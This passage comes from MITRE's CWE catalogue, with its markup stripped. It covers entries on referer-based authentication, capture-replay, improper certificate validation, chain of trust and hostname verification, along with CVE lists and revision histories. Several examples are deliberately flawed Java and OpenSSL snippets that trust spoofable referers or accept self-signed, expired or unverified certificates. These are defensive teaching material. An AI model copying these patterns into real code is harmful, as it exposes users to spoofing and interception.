Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2010-02-16 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Demonstrative_Examples + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2013-06-23 + Critical + Changed type from composite to weakness. + + + CWE Content Team + MITRE + 2013-07-17 + updated Applicable_Platforms, Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2014-02-18 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Demonstrative_Examples, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Trusting Self-reported IP Address + + + + This entry has been deprecated because it was a duplicate of CWE-350. All content has been transferred to CWE-350. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Observed_Examples + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2013-06-23 + Critical + CWE-247 and CWE-292 deprecated and merged into CWE-350 to address duplicates. + + + CWE Content Team + MITRE + 2013-07-17 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2014-07-30 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2021-03-15 + updated Likelihood_of_Exploit, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2021-07-20 + updated Name + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Trusting Self-reported DNS Name + DEPRECATED (Duplicate): Trusting Self-reported DNS Name + + + + The referer field in HTTP requests can be easily modified and, as such, is not a valid means of message integrity checking. + + + + + + + + The referer field in HTML requests can be simply modified by malicious users, rendering it useless as a means of checking the validity of the request in question. + + + + referrer + While the proper spelling might be regarded as "referrer," the HTTP RFCs and their implementations use "referer," so this is regarded as the correct spelling. + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + High + + + Access Control + Gain Privileges or Assume Identity + Actions, which may not be authorized otherwise, can be carried out as if they were validated by the server referred to. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + In order to usefully check if a given action is authorized, some means of strong authentication and method protection must be used. Use other means of authorization that cannot be simply spoofed. Possibilities include a username/password or certificate. + + + + + The following code samples check a packet's referer in order to decide whether or not an inbound request is from a trusted host. + + String trustedReferer = "http://www.example.com/"while(true){n = read(newsock, buffer, BUFSIZE);requestPacket = processPacket(buffer, n);if (requestPacket.referer == trustedReferer){openNewSecureSession(requestPacket);}} + + + boolean processConnectionRequest(HttpServletRequest request){String referer = request.getHeader("referer")String trustedReferer = "http://www.example.com/"if(referer.equals(trustedReferer)){openPrivilegedConnection(request);return true;}else{sendPrivilegeError(request);return false;}} + + These examples check if a request is from a trusted referer before responding to a request, but the code only verifies the referer name as stored in the request packet. An attacker can spoof the referer, thus impersonating a trusted client. + + + + + Using referrer field for authentication + + + SFP29 + Faulty endpoint authentication + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Background_Details, Common_Consequences, Relationships, Relevant_Properties, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships, Relevant_Properties + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A capture-replay flaw exists when the design of the product makes it possible for a malicious user to sniff network traffic and bypass authentication by replaying it to the server in question to the same effect as the original message (or with minor changes). + Capture-replay attacks are common and can be difficult to defeat without cryptography. They are a subset of network injection attacks that rely on observing previously-sent valid commands, then changing them slightly if necessary and resending the same commands to the server. + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + High + + + Access Control + Gain Privileges or Assume Identity + Messages sent with a capture-relay attack allow access to resources which are not otherwise accessible without proper authentication. + + + + + Architecture and Design + Utilize some sequence or time stamping functionality along with a checksum which takes this into account in order to ensure that messages can be parsed only once. + + + Architecture and Design + Since any attacker who can listen to traffic can see sequence numbers, it is necessary to sign messages with some kind of cryptography to ensure that sequence numbers are not simply doctored along with content. + + + + + CVE-2005-3435 + product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks. + https://www.cve.org/CVERecord?id=CVE-2005-3435 + + + CVE-2007-4961 + Chain: cleartext transmission of the MD5 hash of password (CWE-319) enables attacks against a server that is susceptible to replay (CWE-294). + https://www.cve.org/CVERecord?id=CVE-2007-4961 + + + + + Authentication bypass by replay + + + Capture-replay + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-07-27 + updated Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-10-29 + updated Observed_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Demonstrative_Examples + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not validate, or incorrectly validates, a certificate. + When a certificate is invalid or malicious, it might allow an attacker to spoof a trusted entity by interfering in the communication path between the host and client. The product might connect to a malicious host while believing it is a trusted host, or the product might be deceived into accepting spoofed data that appears to originate from a trusted host. + + + + + + + + + + + A certificate is a token that associates an identity (principal) to a cryptographic key. Certificates can be used to check if a public key belongs to the assumed owner. + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Implementation + When the product uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete. + + + + + Integrity + Authentication + Bypass Protection Mechanism + Gain Privileges or Assume Identity + + + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + SOAR Partial + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Man-in-the-middle attack tool + + + + High + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Architecture and Design + Implementation + Certificates should be carefully managed and checked to assure that data are encrypted with the intended owner's public key. + + + Implementation + If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the hostname. + + + + + This code checks the certificate of a connected peer. + + if ((cert = SSL_get_peer_certificate(ssl)) && host)foo=SSL_get_verify_result(ssl); + if ((X509_V_OK==foo) || X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN==foo)) + + + // certificate looks good, host can be trusted + + + + + + In this case, because the certificate is self-signed, there was no external authority that could prove the identity of the host. The program could be communicating with a different system that is spoofing the host, e.g. by poisoning the DNS cache or using an Adversary-in-the-Middle (AITM) attack to modify the traffic from server to client. + + + The following OpenSSL code obtains a certificate and verifies it. + + cert = SSL_get_peer_certificate(ssl);if (cert && (SSL_get_verify_result(ssl)==X509_V_OK)) { + + + // do secret things + + + } + + Even though the "verify" step returns X509_V_OK, this step does not include checking the Common Name against the name of the host. That is, there is no guarantee that the certificate is for the desired host. The SSL connection could have been established with a malicious host that provided a valid certificate. + + + The following OpenSSL code ensures that there is a certificate and allows the use of expired certificates. + + if (cert = SSL_get_peer(certificate(ssl)) { + foo=SSL_get_verify_result(ssl);if ((X509_V_OK==foo) || (X509_V_ERR_CERT_HAS_EXPIRED==foo)) + + + //do stuff + + + + + + + + If the call to SSL_get_verify_result() returns X509_V_ERR_CERT_HAS_EXPIRED, this means that the certificate has expired. As time goes on, there is an increasing chance for attackers to compromise the certificate. + + + The following OpenSSL code ensures that there is a certificate before continuing execution. + + if (cert = SSL_get_peer_certificate(ssl)) { + + + // got a certificate, do secret things + + + + + + Because this code does not use SSL_get_verify_results() to check the certificate, it could accept certificates that have been revoked (X509_V_ERR_CERT_REVOKED). The software could be communicating with a malicious host. + + + The following OpenSSL code ensures that the host has a certificate. + + if (cert = SSL_get_peer_certificate(ssl)) { + + + // got certificate, host can be trusted + + + //foo=SSL_get_verify_result(ssl); + + + //if (X509_V_OK==foo) ... + + + } + + Note that the code does not call SSL_get_verify_result(ssl), which effectively disables the validation step that checks the certificate. + + + + + CVE-2019-12496 + A Go framework for robotics, drones, and IoT devices skips verification of root CA certificates by default. + https://www.cve.org/CVERecord?id=CVE-2019-12496 + + + CVE-2014-1266 + chain: incorrect "goto" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple "goto fail" bug). CWE-705 (Incorrect Control Flow Scoping) -> CWE-561 (Dead Code) -> CWE-295 (Improper Certificate Validation) -> CWE-393 (Return of Wrong Status Code) -> CWE-300 (Channel Accessible by Non-Endpoint). + https://www.cve.org/CVERecord?id=CVE-2014-1266 + + + CVE-2021-22909 + Chain: router's firmware update procedure uses curl with "-k" (insecure) option that disables certificate validation (CWE-295), allowing adversary-in-the-middle (AITM) compromise with a malicious firmware image (CWE-494). + https://www.cve.org/CVERecord?id=CVE-2021-22909 + + + CVE-2008-4989 + Verification function trusts certificate chains in which the last certificate is self-signed. + https://www.cve.org/CVERecord?id=CVE-2008-4989 + + + CVE-2012-5821 + Web browser uses a TLS-related function incorrectly, preventing it from verifying that a server's certificate is signed by a trusted certification authority (CA) + https://www.cve.org/CVERecord?id=CVE-2012-5821 + + + CVE-2009-3046 + Web browser does not check if any intermediate certificates are revoked. + https://www.cve.org/CVERecord?id=CVE-2009-3046 + + + CVE-2011-0199 + Operating system does not check Certificate Revocation List (CRL) in some cases, allowing spoofing using a revoked certificate. + https://www.cve.org/CVERecord?id=CVE-2011-0199 + + + CVE-2012-5810 + Mobile banking application does not verify hostname, leading to financial loss. + https://www.cve.org/CVERecord?id=CVE-2012-5810 + + + CVE-2012-3446 + Cloud-support library written in Python uses incorrect regular expression when matching hostname. + https://www.cve.org/CVERecord?id=CVE-2012-3446 + + + CVE-2009-2408 + Web browser does not correctly handle '\0' character (NUL) in Common Name, allowing spoofing of https sites. + https://www.cve.org/CVERecord?id=CVE-2009-2408 + + + CVE-2012-2993 + Smartphone device does not verify hostname, allowing spoofing of mail services. + https://www.cve.org/CVERecord?id=CVE-2012-2993 + + + CVE-2012-5822 + Application uses third-party library that does not validate hostname. + https://www.cve.org/CVERecord?id=CVE-2012-5822 + + + CVE-2012-5819 + Cloud storage management application does not validate hostname. + https://www.cve.org/CVERecord?id=CVE-2012-5819 + + + CVE-2012-5817 + Java library uses JSSE SSLSocket and SSLEngine classes, which do not verify the hostname. + https://www.cve.org/CVERecord?id=CVE-2012-5817 + + + CVE-2010-1378 + chain: incorrect calculation allows attackers to bypass certificate checks. + https://www.cve.org/CVERecord?id=CVE-2010-1378 + + + CVE-2005-3170 + LDAP client accepts certificates even if they are not from a trusted CA. + https://www.cve.org/CVERecord?id=CVE-2005-3170 + + + CVE-2009-0265 + chain: DNS server does not correctly check return value from the OpenSSL EVP_VerifyFinal function allows bypass of validation of the certificate chain. + https://www.cve.org/CVERecord?id=CVE-2009-0265 + + + CVE-2003-1229 + chain: product checks if client is trusted when it intended to check if the server is trusted, allowing validation of signed code. + https://www.cve.org/CVERecord?id=CVE-2003-1229 + + + CVE-2002-0862 + Cryptographic API, as used in web browsers, mail clients, and other software, does not properly validate Basic Constraints. + https://www.cve.org/CVERecord?id=CVE-2002-0862 + + + CVE-2009-1358 + chain: OS package manager does not check properly check the return value, allowing bypass using a revoked certificate. + https://www.cve.org/CVERecord?id=CVE-2009-1358 + + + + + A10 + Insecure Configuration Management + CWE More Specific + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Background_Details, Description + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2012-12-28 + Critical + Converted from category to weakness class. + + + CWE Content Team + MITRE + 2013-02-21 + updated Applicable_Platforms, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2014-06-23 + updated Observed_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Background_Details, Modes_of_Introduction, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Demonstrative_Examples, Description, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples, Observed_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Modes_of_Introduction + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Certificate Issues + + + + The product does not follow, or incorrectly follows, the chain of trust for a certificate back to a trusted root certificate, resulting in incorrect trust of any resource that is associated with that certificate. + + If a system does not follow the chain of trust of a certificate to a root server, the certificate loses all usefulness as a metric of trust. Essentially, the trust gained from a certificate is derived from a chain of trust -- with a reputable trusted entity at the end of that list. The end user must trust that reputable source, and this reputable source must vouch for the resource in question through the medium of the certificate. + In some cases, this trust traverses several entities who vouch for one another. The entity trusted by the end user is at one end of this trust chain, while the certificate-wielding resource is at the other end of the chain. If the user receives a certificate at the end of one of these trust chains and then proceeds to check only that the first link in the chain, no real trust has been derived, since the entire chain must be traversed back to a trusted source to verify the certificate. + There are several ways in which the chain of trust might be broken, including but not limited to: + + Any certificate in the chain is self-signed, unless it the root. + Not every intermediate certificate is checked, starting from the original certificate all the way up to the root certificate. + An intermediate, CA-signed certificate does not have the expected Basic Constraints or other important extensions. + The root certificate has been compromised or authorized to the wrong party. + + + + + + + + + + + + Implementation + When the product uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete. + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Low + + + Non-Repudiation + Hide Activities + Exploitation of this flaw can lead to the trust of data that may have originated with a spoofed source. + + + Integrity + Confidentiality + Availability + Access Control + Gain Privileges or Assume Identity + Execute Unauthorized Code or Commands + Data, requests, or actions taken by the attacking entity can be carried out as a spoofed benign entity. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Ensure that proper certificate checking is included in the system design. + + + Implementation + Understand, and properly implement all checks necessary to ensure the integrity of certificate trust integrity. + + + Implementation + If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the full chain of trust. + + + + + This code checks the certificate of a connected peer. + + if ((cert = SSL_get_peer_certificate(ssl)) && host)foo=SSL_get_verify_result(ssl); + if ((X509_V_OK==foo) || X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN==foo)) + + + // certificate looks good, host can be trusted + + + + + + In this case, because the certificate is self-signed, there was no external authority that could prove the identity of the host. The program could be communicating with a different system that is spoofing the host, e.g. by poisoning the DNS cache or using an Adversary-in-the-Middle (AITM) attack to modify the traffic from server to client. + + + + + CVE-2016-2402 + Server allows bypass of certificate pinning by sending a chain of trust that includes a trusted CA that is not pinned. + https://www.cve.org/CVERecord?id=CVE-2016-2402 + + + CVE-2008-4989 + Verification function trusts certificate chains in which the last certificate is self-signed. + https://www.cve.org/CVERecord?id=CVE-2008-4989 + + + CVE-2012-5821 + Chain: Web browser uses a TLS-related function incorrectly, preventing it from verifying that a server's certificate is signed by a trusted certification authority (CA). + https://www.cve.org/CVERecord?id=CVE-2012-5821 + + + CVE-2009-3046 + Web browser does not check if any intermediate certificates are revoked. + https://www.cve.org/CVERecord?id=CVE-2009-3046 + + + CVE-2009-0265 + chain: DNS server does not correctly check return value from the OpenSSL EVP_VerifyFinal function allows bypass of validation of the certificate chain. + https://www.cve.org/CVERecord?id=CVE-2009-0265 + + + CVE-2009-0124 + chain: incorrect check of return value from the OpenSSL EVP_VerifyFinal function allows bypass of validation of the certificate chain. + https://www.cve.org/CVERecord?id=CVE-2009-0124 + + + CVE-2002-0970 + File-transfer software does not validate Basic Constraints of an intermediate CA-signed certificate. + https://www.cve.org/CVERecord?id=CVE-2002-0970 + + + CVE-2002-0862 + Cryptographic API, as used in web browsers, mail clients, and other software, does not properly validate Basic Constraints. + https://www.cve.org/CVERecord?id=CVE-2002-0862 + + + + + Failure to follow chain of trust in certificate validation + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-12-13 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, References, Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Modes_of_Introduction, Observed_Examples, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2019-09-19 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Modes_of_Introduction + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Failure to Follow Chain of Trust in Certificate Validation + Improper Following of Chain of Trust for Certificate Validation + + + + The product communicates with a host that provides a certificate, but the product does not properly ensure that the certificate is actually associated with that host. + + Even if a certificate is well-formed, signed, and follows the chain of trust, it may simply be a valid certificate for a different site than the site that the product is interacting with. If the certificate's host-specific data is not properly checked - such as the Common Name (CN) in the Subject or the Subject Alternative Name (SAN) extension of an X.509 certificate - it may be possible for a redirection or spoofing attack to allow a malicious host with a valid certificate to provide data, impersonating a trusted host. In order to ensure data integrity, the certificate must be valid and it must pertain to the site that is being accessed. + Even if the product attempts to check the hostname, it is still possible to incorrectly check the hostname. For example, attackers could create a certificate with a name that begins with a trusted name followed by a NUL byte, which could cause some string-based comparisons to only examine the portion that contains the trusted name. + This weakness can occur even when the product uses Certificate Pinning, if the product does not verify the hostname at the time a certificate is pinned. + + + + + + + + + + + + + Implementation + When the product uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete. + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Access Control + Gain Privileges or Assume Identity + The data read from the system vouched for by the certificate may not be from the expected system. + + + Authentication + Other + Other + Trust afforded to the system in question - based on the malicious certificate - may allow for spoofing or redirection attacks. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + Dynamic Analysis with Manual Results Interpretation + Set up an untrusted endpoint (e.g. a server) with which the product will connect. Create a test certificate that uses an invalid hostname but is signed by a trusted CA and provide this certificate from the untrusted endpoint. If the product performs any operations instead of disconnecting and reporting an error, then this indicates that the hostname is not being checked and the test certificate has been accepted. + + + Black Box + When Certificate Pinning is being used in a mobile application, consider using a tool such as Spinner [REF-955]. This methodology might be extensible to other technologies. + + + + + Architecture and Design + Fully check the hostname of the certificate and provide the user with adequate information about the nature of the problem and how to proceed. + + + Implementation + If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the hostname. + + + + + The following OpenSSL code obtains a certificate and verifies it. + + cert = SSL_get_peer_certificate(ssl);if (cert && (SSL_get_verify_result(ssl)==X509_V_OK)) { + + + // do secret things + + + } + + Even though the "verify" step returns X509_V_OK, this step does not include checking the Common Name against the name of the host. That is, there is no guarantee that the certificate is for the desired host. The SSL connection could have been established with a malicious host that provided a valid certificate. + + + + + CVE-2012-5810 + Mobile banking application does not verify hostname, leading to financial loss. + https://www.cve.org/CVERecord?id=CVE-2012-5810 + + + CVE-2012-5811 + Mobile application for printing documents does not verify hostname, allowing attackers to read sensitive documents. + https://www.cve.org/CVERecord?id=CVE-2012-5811 + + + CVE-2012-5807 + Software for electronic checking does not verify hostname, leading to financial loss. + https://www.cve.org/CVERecord?id=CVE-2012-5807 + + + CVE-2012-3446 + Cloud-support library written in Python uses incorrect regular expression when matching hostname. + https://www.cve.org/CVERecord?id=CVE-2012-3446 + + + CVE-2009-2408 + Web browser does not correctly handle '\0' character (NUL) in Common Name, allowing spoofing of https sites. + https://www.cve.org/CVERecord?id=CVE-2009-2408 + + + CVE-2012-0867 + Database program truncates the Common Name during hostname verification, allowing spoofing. + https://www.cve.org/CVERecord?id=CVE-2012-0867 + + + CVE-2010-2074 + Incorrect handling of '\0' character (NUL) in hostname verification allows spoofing. + https://www.cve.org/CVERecord?id=CVE-2010-2074 + + + CVE-2009-4565 + Mail server's incorrect handling of '\0' character (NUL) in hostname verification allows spoofing. + https://www.cve.org/CVERecord?id=CVE-2009-4565 + + + CVE-2009-3767 + LDAP server's incorrect handling of '\0' character (NUL) in hostname verification allows spoofing. + https://www.cve.org/CVERecord?id=CVE-2009-3767 + + + CVE-2012-5806 + Payment processing module does not verify hostname when connecting to PayPal using PHP fsockopen function. + https://www.cve.org/CVERecord?id=CVE-2012-5806 + + + CVE-2012-2993 + Smartphone device does not verify hostname, allowing spoofing of mail services. + https://www.cve.org/CVERecord?id=CVE-2012-2993 + + + CVE-2012-5804 + E-commerce module does not verify hostname when connecting to payment site. + https://www.cve.org/CVERecord?id=CVE-2012-5804 + + + CVE-2012-5824 + Chat application does not validate hostname, leading to loss of privacy. + https://www.cve.org/CVERecord?id=CVE-2012-5824 + + + CVE-2012-5822 + Application uses third-party library that does not validate hostname. + https://www.cve.org/CVERecord?id=CVE-2012-5822 + + + CVE-2012-5819 + Cloud storage management application does not validate hostname. + https://www.cve.org/CVERecord?id=CVE-2012-5819 + + + CVE-2012-5817 + Java library uses JSSE SSLSocket and SSLEngine classes, which do not verify the hostname. + https://www.cve.org/CVERecord?id=CVE-2012-5817 + + + CVE-2012-5784 + SOAP platform does not verify the hostname. + https://www.cve.org/CVERecord?id=CVE-2012-5784 + + + CVE-2012-5782 + PHP library for payments does not verify the hostname. + https://www.cve.org/CVERecord?id=CVE-2012-5782 + + + CVE-2012-5780 + Merchant SDK for payments does not verify the hostname. + https://www.cve.org/CVERecord?id=CVE-2012-5780 + + + CVE-2003-0355 + Web browser does not validate Common Name, allowing spoofing of https sites. + https://www.cve.org/CVERecord?id=CVE-2003-0355 + + + + + Failure to validate host-specific certificate data + + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 